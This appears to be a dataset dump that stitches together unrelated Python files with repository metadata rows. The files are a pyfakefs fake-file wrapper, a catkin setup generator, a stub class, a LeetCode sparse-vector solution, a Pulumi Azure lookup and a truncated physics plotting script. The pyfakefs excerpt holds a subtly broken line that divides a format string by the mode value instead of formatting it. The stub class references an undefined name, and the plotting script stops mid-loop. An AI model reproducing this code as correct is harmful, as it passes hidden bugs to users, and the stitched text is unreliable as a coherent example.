def __init__(self, file_object, file_path, update=False, read=False, append=False, delete_on_close=False, filesystem=None, newline=None, binary=True, closefd=True, encoding=None, errors=None, raw_io=False, is_stream=False, use_io=True):
# line: 4061
self._file_object = file_object
# line: 4062
self._file_path = file_path
# line: 4063
self._append = append
# line: 4064
self._read = read
# line: 4065
self.allow_update = update
# line: 4066
self._closefd = closefd
# line: 4067
self._file_epoch = file_object.epoch
# line: 4068
self.raw_io = raw_io
# line: 4069
self._binary = binary
# line: 4070
self.is_stream = is_stream
# line: 4071
contents = file_object.byte_contents
# line: 4072
self._encoding = encoding
# line: 4073
errors = (errors or 'strict')
# line: 4074
if encoding:
# line: 4075
file_wrapper = FakeFileWrapper(file_object, file_path, update, read, append, delete_on_close=False, filesystem=filesystem, newline=None, binary=True, closefd=closefd, is_stream=True)
# line: 4079
codec_info = codecs.lookup(encoding)
# line: 4080
self._io = codecs.StreamReaderWriter(file_wrapper, codec_info.streamreader, codec_info.streamwriter, errors)
else:
# line: 4083
if ((not binary) and (sys.version_info >= (3, 0))):
# line: 4084
io_class = io.StringIO
else:
# line: 4086
io_class = io.BytesIO
# line: 4087
io_args = ({} if binary else {'newline': newline, })
# line: 4088
if (contents and (not binary)):
# line: 4089
contents = contents.decode((encoding or locale.getpreferredencoding(False)), errors=errors)
# line: 4091
if (contents and (not update)):
# line: 4092
self._io = io_class(contents, **io_args)
else:
# line: 4094
self._io = io_class(**io_args)
# line: 4096
if contents:
# line: 4097
if update:
# line: 4098
if (not encoding):
# line: 4099
self._io.write(contents)
# line: 4100
if (not append):
# line: 4101
self._io.seek(0)
else:
# line: 4103
self._read_whence = 0
# line: 4104
if (read and (not use_io)):
# line: 4105
self._read_seek = 0
else:
# line: 4107
self._read_seek = self._io.tell()
else:
# line: 4109
self._read_whence = 0
# line: 4110
self._read_seek = 0
# line: 4112
if delete_on_close:
# line: 4113
assert filesystem, 'delete_on_close=True requires filesystem'
# line: 4114
self._filesystem = filesystem
# line: 4115
self.delete_on_close = delete_on_close
# line: 4118
self.name = file_object.opened_as
# line: 4119
self.filedes = None
# line: 4121
def __enter__(self):
# line: 4122
"To support usage of this fake file with the 'with' statement."
# line: 4123
return self
# line: 4125
def __exit__(self, type, value, traceback):
# line: 4126
"To support usage of this fake file with the 'with' statement."
# line: 4127
self.close()
# line: 4129
def _raise(self, message):
# line: 4130
if self.raw_io:
# line: 4131
raise OSError(errno.EBADF, message)
# line: 4132
if (sys.version_info < (3, 0)):
# line: 4133
raise IOError(message)
# line: 4134
raise io.UnsupportedOperation(message)
# line: 4136
def GetObject(self):
# line: 4137
'Return the FakeFile object that is wrapped by the current instance.'
# line: 4138
return self._file_object
# line: 4140
def fileno(self):
# line: 4141
'Return the file descriptor of the file object.'
# line: 4142
return self.filedes
# line: 4144
def close(self):
# line: 4145
'Close the file.'
# line: 4147
if (self not in self._filesystem.open_files):
# line: 4148
return
# line: 4150
if (self.allow_update and (not self.raw_io)):
# line: 4151
self._file_object.SetContents(self._io.getvalue(), self._encoding)
# line: 4152
if self._closefd:
# line: 4153
self._filesystem.CloseOpenFile(self.filedes)
# line: 4154
if self.delete_on_close:
# line: 4155
self._filesystem.RemoveObject(self.GetObject().GetPath())
# line: 4157
def flush(self):
# line: 4158
"Flush file contents to 'disk'."
# line: 4159
self._check_open_file()
# line: 4160
if self.allow_update:
# line: 4161
self._io.flush()
# line: 4162
self._file_object.SetContents(self._io.getvalue(), self._encoding)
# line: 4163
self._file_epoch = self._file_object.epoch
# line: 4165
def seek(self, offset, whence=0):
# line: 4166
"Move read/write pointer in 'file'."
# line: 4167
self._check_open_file()
# line: 4168
if (not self._append):
# line: 4169
self._io.seek(offset, whence)
else:
# line: 4171
self._read_seek = offset
# line: 4172
self._read_whence = whence
# line: 4173
if (not self.is_stream):
# line: 4174
self.flush()
# line: 4176
def tell(self):
# line: 4181
"Return the file's current position.\n\n Returns:\n int, file's current position in bytes.\n "
# line: 4182
self._check_open_file()
# line: 4183
self._flush_for_read()
# line: 4184
if (not self._append):
# line: 4185
return self._io.tell()
# line: 4186
if self._read_whence:
# line: 4187
write_seek = self._io.tell()
# line: 4188
self._io.seek(self._read_seek, self._read_whence)
# line: 4189
self._read_seek = self._io.tell()
# line: 4190
self._read_whence = 0
# line: 4191
self._io.seek(write_seek)
# line: 4192
return self._read_seek
# line: 4194
def _flush_for_read(self):
# line: 4196
if self._flushes_after_read():
# line: 4197
self.flush()
# line: 4199
def _flushes_after_read(self):
# line: 4200
return ((not self.is_stream) and ((not self._filesystem.is_windows_fs) or (sys.version_info[0] > 2)))
# line: 4204
def _sync_io(self):
# line: 4205
'Update the stream with changes to the file object contents.'
# line: 4206
if (self._file_epoch == self._file_object.epoch):
# line: 4207
return
# line: 4209
if isinstance(self._io, io.BytesIO):
# line: 4210
contents = self._file_object.byte_contents
else:
# line: 4212
contents = self._file_object.contents
# line: 4214
is_stream_reader_writer = isinstance(self._io, codecs.StreamReaderWriter)
# line: 4215
if is_stream_reader_writer:
# line: 4216
self._io.stream.allow_update = True
# line: 4217
whence = self._io.tell()
# line: 4218
self._io.seek(0)
# line: 4219
self._io.truncate()
# line: 4220
self._io.write(contents)
# line: 4221
if self._append:
# line: 4222
self._io.seek(0, os.SEEK_END)
else:
# line: 4224
self._io.seek(whence)
# line: 4226
if is_stream_reader_writer:
# line: 4227
self._io.stream.allow_update = False
# line: 4228
self._file_epoch = self._file_object.epoch
# line: 4230
def _ReadWrapper(self, name):
# line: 4241
'Wrap a stream attribute in a read wrapper.\n\n Returns a read_wrapper which tracks our own read pointer since the\n stream object has no concept of a different read and write pointer.\n\n Args:\n name: the name of the attribute to wrap. Should be a read call.\n\n Returns:\n either a read_error or read_wrapper function.\n '
# line: 4242
io_attr = getattr(self._io, name)
# line: 4244
def read_wrapper(*args, **kwargs):
# line: 4256
"Wrap all read calls to the stream object.\n\n We do this to track the read pointer separate from the write\n pointer. Anything that wants to read from the stream object\n while we're in append mode goes through this.\n\n Args:\n *args: pass through args\n **kwargs: pass through kwargs\n Returns:\n Wrapped stream object method\n "
# line: 4257
self._io.seek(self._read_seek, self._read_whence)
# line: 4258
ret_value = io_attr(*args, **kwargs)
# line: 4259
self._read_seek = self._io.tell()
# line: 4260
self._read_whence = 0
# line: 4261
self._io.seek(0, 2)
# line: 4262
return ret_value
# line: 4264
return read_wrapper
# line: 4266
def _OtherWrapper(self, name, writing):
# line: 4274
'Wrap a stream attribute in an other_wrapper.\n\n Args:\n name: the name of the stream attribute to wrap.\n\n Returns:\n other_wrapper which is described below.\n '
# line: 4275
io_attr = getattr(self._io, name)
# line: 4277
def other_wrapper(*args, **kwargs):
# line: 4289
'Wrap all other calls to the stream Object.\n\n We do this to track changes to the write pointer. Anything that\n moves the write pointer in a file open for appending should move\n the read pointer as well.\n\n Args:\n *args: pass through args\n **kwargs: pass through kwargs\n Returns:\n Wrapped stream object method\n '
# line: 4290
write_seek = self._io.tell()
# line: 4291
ret_value = io_attr(*args, **kwargs)
# line: 4292
if (write_seek != self._io.tell()):
# line: 4293
self._read_seek = self._io.tell()
# line: 4294
self._read_whence = 0
# line: 4295
if ((not writing) or (sys.version_info >= (3,))):
# line: 4296
return ret_value
# line: 4298
return other_wrapper
# line: 4300
def _TruncateWrapper(self):
# line: 4305
'Wrap truncate() to allow flush after truncate.\n\n Returns:\n wrapper which is described below.\n '
# line: 4306
io_attr = getattr(self._io, 'truncate')
# line: 4308
def truncate_wrapper(*args, **kwargs):
# line: 4309
'Wrap truncate call to call flush after truncate.'
# line: 4310
if self._append:
# line: 4311
self._io.seek(self._read_seek, self._read_whence)
# line: 4312
size = io_attr(*args, **kwargs)
# line: 4313
self.flush()
# line: 4314
if (not self.is_stream):
# line: 4315
self._file_object.SetSize(size)
# line: 4316
buffer_size = len(self._io.getvalue())
# line: 4317
if (buffer_size < size):
# line: 4318
self._io.seek(buffer_size)
# line: 4319
self._io.write(('\x00' * (size - buffer_size)))
# line: 4320
self._file_object.SetContents(self._io.getvalue(), self._encoding)
# line: 4321
if (sys.version_info >= (3,)):
# line: 4322
return size
# line: 4324
return truncate_wrapper
# line: 4326
def _WriteWrapper(self, name):
# line: 4331
'Wrap write() to adapt return value for Python 2.\n\n Returns:\n wrapper which is described below.\n '
# line: 4332
io_attr = getattr(self._io, name)
# line: 4334
def write_wrapper(*args, **kwargs):
# line: 4335
'Wrap trunctae call to call flush after truncate.'
# line: 4336
ret_value = io_attr(*args, **kwargs)
# line: 4337
if (sys.version_info >= (3,)):
# line: 4338
return ret_value
# line: 4340
return write_wrapper
# line: 4342
def Size(self):
# line: 4343
'Return the content size in bytes of the wrapped file.'
# line: 4344
return self._file_object.st_size
# line: 4346
def __getattr__(self, name):
# line: 4347
if self._file_object.IsLargeFile():
# line: 4348
raise FakeLargeFileIoException(self._file_path)
# line: 4350
reading = (name.startswith('read') or (name == 'next'))
# line: 4351
truncate = (name == 'truncate')
# line: 4352
writing = (name.startswith('write') or truncate)
# line: 4353
if (reading or writing):
# line: 4354
self._check_open_file()
# line: 4355
if ((not self._read) and reading):
# line: 4356
def read_error(*args, **kwargs):
# line: 4357
'Throw an error unless the argument is zero.'
# line: 4358
if (args and (args[0] == 0)):
# line: 4359
if (self._filesystem.is_windows_fs and self.raw_io):
# line: 4360
return ('' if self._binary else u'')
# line: 4361
self._raise('File is not open for reading.')
# line: 4363
return read_error
# line: 4365
if ((not self.allow_update) and writing):
# line: 4366
def write_error(*args, **kwargs):
# line: 4367
'Throw an error.'
# line: 4368
if self.raw_io:
# line: 4369
if (self._filesystem.is_windows_fs and args and (len(args[0]) == 0)):
# line: 4370
return 0
# line: 4371
self._raise('File is not open for writing.')
# line: 4373
return write_error
# line: 4375
if reading:
# line: 4376
self._sync_io()
# line: 4377
self._flush_for_read()
# line: 4378
if truncate:
# line: 4379
return self._TruncateWrapper()
# line: 4380
if self._append:
# line: 4381
if reading:
# line: 4382
return self._ReadWrapper(name)
else:
# line: 4384
return self._OtherWrapper(name, writing)
# line: 4385
if writing:
# line: 4386
return self._WriteWrapper(name)
# line: 4388
return getattr(self._io, name)
# line: 4390
def _check_open_file(self):
# line: 4391
if ((not self.is_stream) and (not (self in self._filesystem.open_files))):
# line: 4392
raise ValueError('I/O operation on closed file')
# line: 4394
def __iter__(self):
# line: 4395
if (not self._read):
# line: 4396
self._raise('File is not open for reading')
# line: 4397
return self._io.__iter__()
# line: 4400
class FakeDirWrapper(object):
# line: 4402
'Wrapper for a FakeDirectory object to be used in open files list.\n '
# line: 4403
def __init__(self, file_object, file_path, filesystem):
# line: 4404
self._file_object = file_object
# line: 4405
self._file_path = file_path
# line: 4406
self._filesystem = filesystem
# line: 4407
self.filedes = None
# line: 4409
def GetObject(self):
# line: 4410
'Return the FakeFile object that is wrapped by the current instance.'
# line: 4411
return self._file_object
# line: 4413
def fileno(self):
# line: 4414
'Return the file descriptor of the file object.'
# line: 4415
return self.filedes
# line: 4417
def close(self):
# line: 4418
'Close the directory.'
# line: 4419
self._filesystem.CloseOpenFile(self.filedes)
# line: 4422
class FakeFileOpen(object):
# line: 4427
'Faked `file()` and `open()` function replacements.\n\n Returns FakeFile objects in a FakeFilesystem in place of the `file()`\n or `open()` function.\n '
# line: 4428
__name__ = 'FakeFileOpen'
# line: 4430
def __init__(self, filesystem, delete_on_close=False, use_io=False, raw_io=False):
# line: 4438
'init.\n\n Args:\n filesystem: FakeFilesystem used to provide file system information\n delete_on_close: optional boolean, deletes file on close()\n use_io: if True, the io.open() version is used (ignored for Python 3,\n where io.open() is an alias to open() )\n '
# line: 4439
self.filesystem = filesystem
# line: 4440
self._delete_on_close = delete_on_close
# line: 4441
self._use_io = (use_io or (sys.version_info >= (3, 0)) or (platform.python_implementation() == 'PyPy'))
# line: 4443
self.raw_io = raw_io
# line: 4445
def __call__(self, *args, **kwargs):
# line: 4446
'Redirects calls to file() or open() to appropriate method.'
# line: 4447
if self._use_io:
# line: 4448
return self.Call(*args, **kwargs)
else:
# line: 4450
return self._call_ver2(*args, **kwargs)
# line: 4452
def _call_ver2(self, file_path, mode='r', buffering=(-1), flags=None, open_modes=None):
# line: 4453
'Limits args of open() or file() for Python 2.x versions.'
# line: 4455
mode = (flags or mode)
# line: 4456
return self.Call(file_path, mode, buffering, open_modes=open_modes)
# line: 4458
def Call(self, file_, mode='r', buffering=(-1), encoding=None, errors=None, newline=None, closefd=True, opener=None, open_modes=None):
# line: 4484
"Return a file-like object with the contents of the target file object.\n\n Args:\n file_: path to target file or a file descriptor.\n mode: additional file modes. All r/w/a/x r+/w+/a+ modes are supported.\n 't', and 'U' are ignored, e.g., 'wU' is treated as 'w'. 'b' sets\n binary mode, no end of line translations in StringIO.\n buffering: ignored. (Used for signature compliance with __builtin__.open)\n encoding: the encoding used to encode unicode strings / decode bytes.\n New in pyfakefs 2.9.\n errors: ignored, this relates to encoding.\n newline: controls universal newlines, passed to stream object.\n closefd: if a file descriptor rather than file name is passed, and set\n to false, then the file descriptor is kept open when file is closed.\n opener: not supported.\n open_modes: Modes for opening files if called from low-level API\n\n Returns:\n a file-like object containing the contents of the target file.\n\n Raises:\n IOError: if the target object is a directory, the path is invalid or\n permission is denied.\n "
# line: 4485
orig_modes = mode
# line: 4487
binary = ((sys.version_info < (3, 0)) or ('b' in mode))
# line: 4489
mode = mode.replace('t', '').replace('b', '')
# line: 4490
mode = mode.replace('rU', 'r').replace('U', 'r')
# line: 4492
if (not self.raw_io):
# line: 4493
if (mode not in _OPEN_MODE_MAP):
# line: 4494
raise ValueError(('Invalid mode: %r' / orig_modes))
# line: 4495
open_modes = _OpenModes(*_OPEN_MODE_MAP[mode])
# line: 4497
file_object = None
# line: 4498
filedes = None
# line: 4500
if isinstance(file_, int):
# line: 4501
filedes = file_
# line: 4502
wrapper = self.filesystem.GetOpenFile(filedes)
# line: 4503
self._delete_on_close = wrapper.delete_on_close
# line: 4504
file_object = self.filesystem.GetOpenFile(filedes).GetObject()
# line: 4505
file_path = file_object.name
else:
# line: 4507
file_path = file_
# line: 4508
real_path = self.filesystem.ResolvePath(file_path, raw_io=self.raw_io)
# line: 4509
if self.filesystem.Exists(file_path):
# line: 4510
file_object = self.filesystem.GetObjectFromNormalizedPath(real_path)
# line: 4511
closefd = True
# line: 4513
error_class = (OSError if self.raw_io else IOError)
# line: 4514
if (open_modes.must_not_exist and (file_object or self.filesystem.IsLink(file_path))):
# line: 4515
raise error_class(errno.EEXIST, 'File exists', file_path)
# line: 4516
if file_object:
# line: 4517
if ((open_modes.can_read and (not (file_object.st_mode & PERM_READ))) or (open_modes.can_write and (not (file_object.st_mode & PERM_WRITE)))):
# line: 4519
raise error_class(errno.EACCES, 'Permission denied', file_path)
# line: 4520
if open_modes.can_write:
# line: 4521
if open_modes.truncate:
# line: 4522
file_object.SetContents('')
else:
# line: 4524
if open_modes.must_exist:
# line: 4525
raise error_class(errno.ENOENT, 'No such file or directory', file_path)
# line: 4526
file_object = self.filesystem.CreateFileInternally(real_path, create_missing_dirs=False, apply_umask=True, raw_io=self.raw_io)
# line: 4529
if stat.S_ISDIR(file_object.st_mode):
# line: 4530
if self.filesystem.is_windows_fs:
# line: 4531
raise OSError(errno.EPERM, 'Fake file object: is a directory', file_path)
else:
# line: 4533
raise error_class(errno.EISDIR, 'Fake file object: is a directory', file_path)
# line: 4537
file_object.opened_as = file_path
# line: 4539
fakefile = FakeFileWrapper(file_object, file_path, update=open_modes.can_write, read=open_modes.can_read, append=open_modes.append, delete_on_close=self._delete_on_close, filesystem=self.filesystem, newline=newline, binary=binary, closefd=closefd, encoding=encoding, errors=errors, raw_io=self.raw_io, use_io=self._use_io)
# line: 4553
if (filedes is not None):
# line: 4554
fakefile.filedes = filedes
# line: 4556
self.filesystem.open_files[filedes] = fakefile
else:
# line: 4558
fakefile.filedes = self.filesystem.AddOpenFile(fakefile)
# line: 4559
return fakefile
# line: 4562
def _RunDoctest():
# line: 4563
import doctest
# line: 4564
from pyfakefs import fake_filesystem
# line: 4565
return doctest.testmod(fake_filesystem)
# line: 4568
if (__name__ == '__main__'):
# line: 4569
_RunDoctest() | [
"agroce@gmail.com"
] | agroce@gmail.com |
2354e68f86530ec792a0467d7921cdedfcf18ffe | ddb8c14775dfbe9424691dabf1617273d118d317 | /catkin_ws/build/rosbag_to_csv/catkin_generated/generate_cached_setup.py | 75342eae56288eb9bc45fb5511687fd8d0f16df0 | [] | no_license | rishabhdevyadav/fastplanneroctomap | e8458aeb1f2d3b126d27dc57011c87ae4567687a | de9d7e49cb1004f3b01b7269dd398cf264ed92b4 | refs/heads/main | 2023-05-12T22:12:27.865900 | 2021-05-26T19:25:31 | 2021-05-26T19:25:31 | 356,674,577 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,329 | py | # -*- coding: utf-8 -*-
from __future__ import print_function
import os
import stat
import sys
# find the import for catkin's python package - either from source space or from an installed underlay
if os.path.exists(os.path.join('/opt/ros/melodic/share/catkin/cmake', 'catkinConfig.cmake.in')):
sys.path.insert(0, os.path.join('/opt/ros/melodic/share/catkin/cmake', '..', 'python'))
try:
from catkin.environment_cache import generate_environment_script
except ImportError:
# search for catkin package in all workspaces and prepend to path
for workspace in '/home/rishabh/catkin_ws/devel;/opt/ros/melodic'.split(';'):
python_path = os.path.join(workspace, 'lib/python2.7/dist-packages')
if os.path.isdir(os.path.join(python_path, 'catkin')):
sys.path.insert(0, python_path)
break
from catkin.environment_cache import generate_environment_script
code = generate_environment_script('/home/rishabh/catkin_ws/devel/.private/rosbag_to_csv/env.sh')
output_filename = '/home/rishabh/catkin_ws/build/rosbag_to_csv/catkin_generated/setup_cached.sh'
with open(output_filename, 'w') as f:
# print('Generate script for cached setup "%s"' % output_filename)
f.write('\n'.join(code))
mode = os.stat(output_filename).st_mode
os.chmod(output_filename, mode | stat.S_IXUSR)
| [
"rishabhdevyadav95@gmail.com"
] | rishabhdevyadav95@gmail.com |
8c42e5185cd19ce89eb94c84bb3c322b1804aa6a | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_histories.py | 17f1b20f237ac5840ec05fd67dc1b6cdf2391ec7 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 228 | py |
#calss header
class _HISTORIES():
def __init__(self,):
self.name = "HISTORIES"
self.definitions = history
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['history']
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
cced9e47a43e84015736e4fd09d4ccfba0f30baf | fc5734ad9b0dc154b3a36ec2f5d848b3d693473f | /solutions/Hash Tables/dot_product_of_two_sparse_vectors.py | 896d3a57d9ce44a518484cdc2456a6631b02371e | [
"MIT"
] | permissive | aimdarx/data-structures-and-algorithms | 8e51ec2144b6e0c413bc7ef0c46aba749fd70a99 | 1659887b843c5d20ee84a24df152fb4f763db757 | refs/heads/master | 2023-08-28T12:00:33.073788 | 2021-11-07T08:31:28 | 2021-11-07T08:31:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,652 | py | """
Dot Product of Two Sparse Vectors:
Given two sparse vectors, compute their dot product.
Implement class SparseVector:
SparseVector(nums) Initializes the object with the vector nums
dotProduct(vec) Compute the dot product between the instance of SparseVector and vec
A sparse vector is a vector that has mostly zero values, you should store the sparse vector efficiently and compute the dot product between two SparseVector.
Follow up: What if only one of the vectors is sparse?
Example 1:
Input: nums1 = [1,0,0,2,3], nums2 = [0,3,0,4,0]
Output: 8
Explanation: v1 = SparseVector(nums1) , v2 = SparseVector(nums2)
v1.dotProduct(v2) = 1*0 + 0*3 + 0*0 + 2*4 + 3*0 = 8
Example 2:
Input: nums1 = [0,1,0,0,0], nums2 = [0,0,0,0,2]
Output: 0
Explanation: v1 = SparseVector(nums1) , v2 = SparseVector(nums2)
v1.dotProduct(v2) = 0*0 + 1*0 + 0*0 + 0*0 + 0*2 = 0
Example 3:
Input: nums1 = [0,1,0,0,2,0,0], nums2 = [1,0,0,0,3,0,4]
Output: 6
https://leetcode.com/problems/dot-product-of-two-sparse-vectors
"""
class SparseVector:
def __init__(self, nums):
self.non_zero = {}
for idx, num in enumerate(nums):
if num != 0:
self.non_zero[idx] = num
# Return the dotProduct of two sparse vectors
def dotProduct(self, vec: 'SparseVector'):
total = 0
for idx in self.non_zero:
if idx in vec.non_zero:
total += self.non_zero[idx] * vec.non_zero[idx]
return total
# Your SparseVector object will be instantiated and called as such:
# v1 = SparseVector(nums1)
# v2 = SparseVector(nums2)
# ans = v1.dotProduct(v2)
| [
"noreply@github.com"
] | aimdarx.noreply@github.com |
e485686f7b3e2f193e4c57591b0c968748577699 | a6e4a6f0a73d24a6ba957277899adbd9b84bd594 | /sdk/python/pulumi_azure_native/portal/v20181001/get_console.py | ddcd939b6a17147c3b434fa54036381df2a55ba9 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | MisinformedDNA/pulumi-azure-native | 9cbd75306e9c8f92abc25be3f73c113cb93865e9 | de974fd984f7e98649951dbe80b4fc0603d03356 | refs/heads/master | 2023-03-24T22:02:03.842935 | 2021-03-08T21:16:19 | 2021-03-08T21:16:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,840 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
__all__ = [
'GetConsoleResult',
'AwaitableGetConsoleResult',
'get_console',
]
@pulumi.output_type
class GetConsoleResult:
    """
    Cloud shell console.

    Generated output type wrapping the payload returned by the
    ``azure-native:portal/v20181001:getConsole`` invoke.
    """
    def __init__(__self__, properties=None):
        # Guard against the engine handing back a non-dict payload; an empty
        # value is allowed through unchanged.
        if properties and not isinstance(properties, dict):
            raise TypeError("Expected argument 'properties' to be a dict")
        pulumi.set(__self__, "properties", properties)

    @property
    @pulumi.getter
    def properties(self) -> 'outputs.ConsolePropertiesResponse':
        """
        Cloud shell console properties.
        """
        return pulumi.get(self, "properties")
class AwaitableGetConsoleResult(GetConsoleResult):
    # pylint: disable=using-constant-test
    def __await__(self):
        # The unreachable ``yield`` turns this method into a generator,
        # which is what makes instances awaitable; awaiting simply returns
        # a plain GetConsoleResult built from this object's data.
        if False:
            yield self
        return GetConsoleResult(
            properties=self.properties)
def get_console(console_name: Optional[str] = None,
                opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetConsoleResult:
    """
    Look up a cloud shell console.

    :param str console_name: The name of the console
    :param pulumi.InvokeOptions opts: options controlling the invoke (version, provider, ...)
    :return: an awaitable result wrapping the console properties
    """
    __args__ = dict()
    __args__['consoleName'] = console_name
    # Pin the provider version so the engine loads the matching plugin.
    if opts is None:
        opts = pulumi.InvokeOptions()
    if opts.version is None:
        opts.version = _utilities.get_version()
    # Invoke the data-source function against the Azure Native provider.
    __ret__ = pulumi.runtime.invoke('azure-native:portal/v20181001:getConsole', __args__, opts=opts, typ=GetConsoleResult).value

    return AwaitableGetConsoleResult(
        properties=__ret__.properties)
| [
"noreply@github.com"
] | MisinformedDNA.noreply@github.com |
3dea403c0921ac41742d895248e227a4874a3559 | 706c38c11c2fc64ab9b4a2f66b510ca9f4fa24b9 | /CSCEfficiency/NtupleAnzScripts/Step2_PlotAll_pallete.py~ | c6b0b11ca4c6ca0ec8b4650a040093616f5c678a | [] | no_license | stremreich/CSCefficiency | dd1e428cba0200cb66b1623ae4e6b9effaa205cf | 4d071e4ceec1c2084670f1af049156c338434a98 | refs/heads/master | 2020-03-25T15:11:15.366403 | 2020-02-03T17:55:59 | 2020-02-03T17:55:59 | 143,870,046 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 18,218 | #!/usr/bin/python
#Author: Jinzhong Zhang(zhangjin@cern.ch), Northeastern University, Boston, U.S.A
#################################################################################
#Advanced Usage:
#python Step2_PlotAll.py arg1 arg2
# arg1 is directory of the files given by the TagandProbe cmssw package. The file names have to match what is defined in Config.py;
# arg2 "lct_effV"+arg2 and "seg_effV"+arg2 are the directory name in the TagandProbe result file;
# arg2 can be specified as "bkg" or "sig" for background and signal modeling
#Example1(plot default efficiencies): python Step2_PlotAll.py
#Example2(systematic -- bkg modeling): python Step2_PlotAll.py /uscms/home/zhangjin/nobackup/ bkg
#Example3(systematic -- sig modeling): python Step2_PlotAll.py /uscms/home/zhangjin/nobackup/ sig
#Example4(systematic -- MCTruth ): python Step2_PlotAll.py /uscms/home/zhangjin/nobackup/ mc
#Example2-4 are used for systematic calculation.
##################################################################################
from ROOT import *
import ROOT
from numpy import *
import numpy
from Config import *
gROOT.SetStyle("Plain")
gStyle.SetPaintTextFormat("4.1f")
gStyle.SetOptStat(0)
gStyle.SetFrameBorderMode(0)
gStyle.SetCanvasBorderMode(0)
gStyle.SetPadBorderMode(0)
gStyle.SetPadColor(0)
gStyle.SetCanvasColor(0)
gStyle.SetTitleColor(1)
gStyle.SetStatColor(0)
gStyle.SetFrameFillColor(0)
gStyle.SetFrameLineWidth(0)
gStyle.SetCanvasBorderMode(0)
gStyle.SetCanvasBorderSize(0)
gStyle.SetFrameBorderMode(0)
#gStyle.SetPaveBorderMode(0)
gStyle.SetMarkerStyle(8)
#gStyle.SetMarkerColor(0)
#gStyle.SetHistLineWidth(1.85)
gStyle.SetLineStyleString(2,"[12 12]")
gStyle.SetOptTitle(1)
gStyle.SetOptStat(1)
gStyle.SetOptFit(1)
#gStyle.SetOptTitle(0)
gStyle.SetOptStat(0)
gStyle.SetPadBorderSize(0)
gStyle.SetCanvasBorderSize(0)
gStyle.SetLegendBorderSize(0)
gStyle.SetFrameBorderSize(0)
gStyle.SetStatBorderSize(0)
gStyle.SetTitleBorderSize(0)
#TagProbeFitResult="2015C_newAlign_withHLTIsoTkMu_matchOtherStationsORME13/TnP_"+dir_+"_"#Those files are the TagProbeFitTreeAnalyzer outputs.
TagProbeFitResult="TnP_"+dir_+"_"
Group="Chambers"  # granularity of the efficiency scan: per-chamber results

if "Chambers" in Group:
    # Build the list of all CSC chamber names "ME<endcap><station>_<ring>_<chamber>".
    chambers=[]
    for ec_ in (True,False):  # True: plus endcap ('+'), False: minus endcap ('-')
        for st_ in (1,2,3,4):  # station
            for rg_ in range(1,5) if st_==1 else range(1,3):  # ring: 4 rings in station 1, 2 elsewhere
                if st_!=1 and rg_==1: #ME21,31,41 have 18 chambers
                    chambers_=range(1,19)
                elif st_==4 and rg_==2: #ME42 has 5 chambers on the plus side
                    # NOTE(review): despite the comment above, ME42 is scanned over
                    # all 36 chamber slots here; the 5-chamber variant is commented
                    # out below — confirm which is intended.
                    chambers_=range(1,37)
#                    chambers_=(9,10,11,12,13) if ec_ else ()
                else: #ME11,12,13,22,32 have 36 chambers
                    chambers_=range(1,37)
                for ch_ in chambers_:
                    chambers.append( "ME%s%d_%d_%d"%( '+' if (ec_) else '-', st_, rg_, ch_ ) )
    n_chambers=len(chambers)
from array import array as arr
#Red = arr('d',[0.00, 0.00, 0.00, 1.00, 1.00])
#Green = arr('d',[0.00, 0.10, 1.00, 1.00, 0.00])
#Blue = arr('d',[1.00, 0.90, 0.00, 0.00, 0.00])
#Length = arr('d',[0.00, 0.40, 0.60, 0.80, 1.00])
#TColor.CreateGradientColorTable(5,Length,Red,Green,Blue,500)
#Red = arr('d',[.00, 1.00, 1.00])
#Green = arr('d',[1.00, 1.00, 0.00])
#Blue = arr('d',[0.00, 0.00, 0.00])
#Length = arr('d',[0.00, 0.5, 1.00])
#TColor.CreateGradientColorTable(3,Length,Red,Green,Blue,500)
#Red = arr('d',[1.00, 1.00, 1.00, .00])
#Green = arr('d',[0., 0.00, 1.00, 1.00])
#Blue = arr('d',[1.00, 0.00, 0.00, 0.00])
#Length = arr('d',[0.00, 0.1, 0.55, 1.00])
#TColor.CreateGradientColorTable(4,Length,Red,Green,Blue,500)
Red = arr('d',[0.,1.00, 1.00, 1.00, .00])
Green = arr('d',[0.,0., 0.00, 1.00, 1.00])
Blue = arr('d',[1.0,1.00, 0.00, 0.00, 0.00])
Length = arr('d',[0.00, 0.4, 0.6, 0.8, 1.00])
TColor.CreateGradientColorTable(5,Length,Red,Green,Blue,500)
gStyle.SetNumberContours(500)
def unshitify(pave):
    """Strip the fill style and border from a ROOT TPave-like object."""
    for clear_attribute in (pave.SetFillStyle, pave.SetBorderSize):
        clear_attribute(0)
cms_label = ROOT.TPaveText(0.06, 0.84, 0.9, 1.0, "NDC")
unshitify(cms_label)
cms_label.SetTextSize(0.03)
cms_label.SetTextAlign(12)
cms_label.AddText("CMS Preliminary #sqrt{s}=13 TeV, 2016B")
# by Nick:
#Float_t rgb[300] = {0}
rgb=zeros(300, dtype=float)
#pEff=zeros(100, dtype=int)
pEff = numpy.ndarray( [100],dtype=numpy.float32)
paletteSize = 100
nContours = 100
for i in range(paletteSize):
rgb[3 * i + 0] = 0.0
rgb[3 * i + 1] = 0.8
rgb[3 * i + 2] = 0.0
if i <= 97:
rgb[3 * i + 0] = 0.5
rgb[3 * i + 1] = 1.0
rgb[3 * i + 2] = 0.0
if i <= 96:
rgb[3 * i + 0] = 1.0
rgb[3 * i + 1] = 1.0
rgb[3 * i + 2] = 0.0
if i <= 94:
rgb[3 * i + 0] = 1.0
rgb[3 * i + 1] = 0.5
rgb[3 * i + 2] = 0.0
if i <= 89:
rgb[3 * i + 0] = 1.0
